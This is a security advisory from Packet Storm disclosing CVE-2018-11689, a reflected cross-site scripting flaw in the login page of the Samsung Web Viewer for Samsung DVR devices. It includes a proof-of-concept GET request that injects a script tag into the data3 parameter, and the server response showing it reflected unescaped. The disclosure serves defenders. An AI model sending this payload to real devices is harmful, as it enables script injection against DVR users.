Samsung Web Viewer For Samsung DVR Cross Site Scripting

2018-06-13T00:00:00
ID PACKETSTORM:148183
Type packetstorm
Reporter Yavuz Atlas
Modified 2018-06-13T00:00:00

Description

                                        
                                            `I. VULNERABILITY  
-------------------------  
Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS)  
  
II. CVE REFERENCE  
-------------------------  
CVE-2018-11689  
  
III. REFERENCES  
-------------------------  
https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11689  
  
IV. CREDIT  
-------------------------  
Yavuz Atlas - Biznet Bilisim  
http://www.biznet.com.tr/biznet-guvenlik-duyurulari  
  
V. DESCRIPTION  
-------------------------  
Samsung Web Viewer for Samsung DVR devices (Samsung Smart Viewer) is  
vulnerable to cross-site scripting. The vulnerability allows remote  
attackers to inject arbitrary web script or HTML.  
  
VI. PROOF OF CONCEPT  
-------------------------  
Request:  
GET /cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script>  
HTTP/1.1  
Host: 10.10.10.10  
  
Response:  
HTTP/1.1 200 OK  
X-UA-Compatible: IE=EmulateIE9, requiresActiveX=true  
Content-type: text/html  
Connection: close  
Date: Wed, 23 May 2018 11:14:09 GMT  
Server: lighttpd/1.4.35  
Content-Length: 10797  
a|  
function setcookie(){  
var val_rand = Math.random();  
if(is_close_user_session == true)  
document.login_page_submit.close_user_session.value = 1;  
else  
document.login_page_submit.close_user_session.value = 0;  
document.login_page_submit.data1.value =  
data_parser(document.login_page.data1.value);  
document.login_page_submit.data2.value =  
do_encrypt(document.login_page.data2.value);  
document.login_page_submit.data3.value = </script><script>alert(1)</script>;  
document.login_page_submit.data4.value = val_rand;  
document.login_page_submit.submit();  
}  
a|  
`